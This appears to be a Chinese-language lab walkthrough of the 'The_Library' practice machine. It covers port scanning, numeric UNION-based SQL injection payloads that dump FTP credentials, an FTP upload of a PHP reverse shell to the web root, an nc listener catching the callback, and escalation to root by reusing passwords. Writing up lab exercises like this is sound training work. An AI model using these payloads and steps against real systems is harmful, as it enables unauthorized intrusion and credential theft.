The_Library 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.142              
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 11:07 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00031s latency).                                                                                      
Not shown: 55531 filtered tcp ports (no-response), 10002 closed tcp ports (reset)                                   
PORT   STATE SERVICE                                                                                                
21/tcp open  ftp                                                                                                    
80/tcp open  http                                                                                                   
MAC Address: 00:0C:29:E5:3F:72 (VMware)                                                                                    

开放了 21 和 80 端口

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nmap -sT -sV -sC -O -p21,80 192.1.1.142             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 11:08 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00026s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:E5:3F:72 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 3.16 - 4.6 (95%), Linux 4.2 (94%), Linux 3.13 (93%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (93%), Linux 4.10 (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Linux 3.2 - 3.10 (93%), Linux 3.2 - 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Ubuntu 操作系统

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nmap --script=vuln -p21,80 192.1.1.142             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 11:10 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.1.1.142
Host is up (0.00022s latency).

PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:E5:3F:72 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 352.05 seconds

没有明显的漏洞和网站路径

尝试 ftp 匿名登录，失败，那只能着眼于 Web 渗透

Web 渗透

查看 Web 界面的同时使用目录爆破。Web 界面 是Apache2 Ubuntu Default Page，等一等目录爆破的结果

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo dirsearch -u http://192.1.1.142                                                                        
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.142/_23-08-15_11-16-53.txt

Error Log: /root/.dirsearch/logs/errors-23-08-15_11-16-53.log

Target: http://192.1.1.142/

[11:16:53] Starting: 
[11:16:54] 403 -  297B  - /.ht_wsr.txt                                     
[11:16:54] 403 -  300B  - /.htaccess.bak1                                  
[11:16:54] 403 -  300B  - /.htaccess.orig
[11:16:54] 403 -  300B  - /.htaccess.save
[11:16:54] 403 -  302B  - /.htaccess.sample
[11:16:54] 403 -  298B  - /.htaccessBAK
[11:16:54] 403 -  301B  - /.htaccess_extra
[11:16:54] 403 -  298B  - /.htaccess_sc
[11:16:54] 403 -  300B  - /.htaccess_orig
[11:16:54] 403 -  299B  - /.htaccessOLD2
[11:16:54] 403 -  298B  - /.htaccessOLD
[11:16:54] 403 -  290B  - /.htm                                            
[11:16:54] 403 -  291B  - /.html
[11:16:54] 403 -  296B  - /.htpasswds
[11:16:54] 403 -  300B  - /.htpasswd_test                                  
[11:16:54] 403 -  297B  - /.httr-oauth
[11:16:55] 403 -  290B  - /.php                                            
[11:16:55] 403 -  291B  - /.php3                                           
[11:17:11] 200 -   11KB - /index.html                                       
[11:17:12] 200 -    2KB - /library.php                                      
[11:17:19] 403 -  300B  - /server-status/                                   
[11:17:19] 403 -  299B  - /server-status

SQL 注入

看到一个有意思的文件 library.php ，点击一下可点击按钮

看看 burp suite 抓到的包

仔细观察，有几个比较在意的点，虽然提示没有信息，但是 We couldn’t find any information for 之后理论上应该跟着一个对象，尤其是最后还有个句号也是暗示。大概率这里存在攻击路径，接下来我尝试了对 lastviewed 的值和 country 的值进行模糊测试，但是结果不理想，看到回应源码中有个算法标识

<!-- ripemd160 -->

根据这个算法标志我尝试了对 lastviewed 的值和 country 的值进行加密，但依然没有得到结果，在这里卡了蛮久的。反思了一下为什么自己这里没有办法进一步想到攻击路径，一方面最近有点浮躁，思考不够深入，加上对于注入点的理解其实还是有偏差，虽然观察到了注入点却没有放在心上，只在最明显的注入点上进行了测试

注入点判断是一方面，而对于注入点如何构造合适的 payload 也是对我们能力的一个考验

我尝试了 burp suite 中自带的 sql 注入的字典和 fuzz 的字典，但均没有收获

直接使用 sqlmap 也有问题（还是不太清除 sqlmap 怎么指定注入点，还是得抽时间专门学一下 sqlmap 的使用），还把靶机的服务给搞崩了，只能重启靶机

这次用一下 seclist 中的字典

发现一个非常有意思的事情，当构造是 0 的时候，响应内容里多了个Norway

继续构造 0 and 1=1 的时候有回显，构造 0 and 1=2 的时候无回显（Norway 为空）。这就确定了是存在注入的，而且是数字型的注入，接下来就是很经典的操作了，先使用 ordy by 确定列数

0 order by 2
0 order by 1

确定了列数为 1，接下来我们将继续构造

0 union select database()
# 这里发现直接就可以看到回显，如果直接看不到回显的话，我们需要将0的位置换成1，人为构造出前面无回显结果，防止union的结果被覆盖（显示位上被覆盖）

1 union select database()

网站是 PHP 搭建的，猜测可能是 MySQL 数据库，先按 MySQL 数据库试一试

0 union select group_concat(table_name) from information_schema.tables where table_schema='library'

# 返回结果
access,countries

的确就是 MySQL 数据库，继续构造 SQL 语句

0 union select group_concat(column_name) from information_schema.columns where table_name='access'

# 返回结果
id,service,username,password

到了振奋人心的时刻总算能看到表里的内容了，构造如下

0 union select group_concat(id,service,0x2D,username,0x2D,password) from access

# 返回结果
1ftp-globus-AroundTheWor

确定了 ftp 的用户名和密码，登录上去看看

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ ftp 192.1.1.142
Connected to 192.1.1.142.
220 (vsFTPd 3.0.3)
Name (192.1.1.142:kali): globus
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43525|)
150 Here comes the directory listing.
drwxrwxrwx    2 1001     1001         4096 Jul 22  2019 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||58705|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0           11321 Jul 17  2019 index.html
-rwxrwxrwx    1 0        0            2831 Jul 22  2019 library.php
-rwxrwxrwx    1 0        0            3172 Jul 21  2019 style.css
226 Directory send OK.

是网站根目录啊，那直接上传个 PHP 反弹 shell 的文件

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||53363|)
150 Ok to send data.
100% |***********************************************************************|  3461       48.53 MiB/s    00:00 ETA
226 Transfer complete.
3461 bytes sent in 00:00 (7.08 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||23655|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0           11321 Jul 17  2019 index.html
-rwxrwxrwx    1 0        0            2831 Jul 22  2019 library.php
-rw-------    1 1001     1001         3461 Aug 15 10:55 php-reverse-shell.php
-rwxrwxrwx    1 0        0            3172 Jul 21  2019 style.css
226 Directory send OK.
ftp> chmod 777 php-reverse-shell.php
200 SITE CHMOD command ok.

上传成功还得修改下文件权限

反弹 shell

攻击机开启监听后，浏览器访问后成功反弹 shell

┌──(kali㉿kali)-[~/Downloads/The_Library]
└─$ sudo nc -lvnp 1234                         
[sudo] password for kali: 
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.142] 40564
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 10:57:17 up 25 min,  0 users,  load average: 0.00, 0.18, 0.41
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:e5:3f:72 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.142/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1157sec preferred_lft 1157sec
    inet6 fe80::c618:cfcc:b9c1:293c/64 scope link 
       valid_lft forever preferred_lft forever
$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: AroundTheWorld

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
www-data@ubuntu:/$ ls -liah /home
ls -liah /home
total 16K
393217 drwxr-xr-x  4 root    root    4.0K Jul 22  2019 .
     2 drwxr-xr-x 24 root    root    4.0K Jul 17  2019 ..
406288 drwxr-xr-x  2 globus  globus  4.0K Jul 22  2019 globus
405562 drwxr-xr-x 16 library library 4.0K Jul 22  2019 library

看到有个用户和 ftp 用户重名，那就试试能不能使用 ftp 的密码切换登录

www-data@ubuntu:/$ su globus   
su globus
Password: AroundTheWorld

globus@ubuntu:~/html$ sudo -l
sudo -l
[sudo] password for globus: AroundTheWorld

Sorry, user globus may not run sudo on ubuntu.

成功了，接下来在各个目录进行简单的信息收集，看了用户家目录、passwd 文件权限、定时任务、SUID 文件，查看了进程运行情况，看到了 MySQL，尝试去网站根目录看看有没有数据库连接的密码

在 library.php 中看到了以下内容

$DATABASE_HOST = 'localhost';
$DATABASE_USER = 'username';
$DATABASE_PASS = 'password';
$DATABASE_NAME = 'library';

密码重用

尝试使用 password 登录 root 用户

globus@ubuntu:~/html$ su root
su root
Password: password

root@ubuntu:/var/www/html# cd /root
cd /root
root@ubuntu:~# ls -liah
ls -liah
total 64K
786434 drwx------ 10 root root 4.0K Jul 22  2019 .
     2 drwxr-xr-x 24 root root 4.0K Jul 17  2019 ..
788540 -rw-------  1 root root  550 Jul 22  2019 .bash_history
789161 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
789160 drwx------  5 root root 4.0K Jul 21  2019 .cache
788545 drwxr-xr-x  5 root root 4.0K Jul 17  2019 .config
788539 drwx------  3 root root 4.0K Jul 17  2019 .dbus
788573 drwxr-xr-x  2 root root 4.0K Jul 21  2019 Desktop
788588 drwx------  2 root root 4.0K Jul 21  2019 .gconf
788549 drwxr-xr-x  3 root root 4.0K Jul 17  2019 .local
788553 drwx------  4 root root 4.0K Jul 21  2019 .mozilla
786436 -rw-------  1 root root 2.3K Jul 21  2019 .mysql_history
788676 drwxr-xr-x  2 root root 4.0K Jul 22  2019 .nano
789162 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
788567 -rw-------  1 root root 5.7K Jul 22  2019 .viminfo
root@ubuntu:~# cd Desktop
cd Desktop
root@ubuntu:~/Desktop# ls -liah
ls -liah
total 8.0K
788573 drwxr-xr-x  2 root root 4.0K Jul 21  2019 .
786434 drwx------ 10 root root 4.0K Jul 22  2019 ..

没有 flag 文件，结束战斗！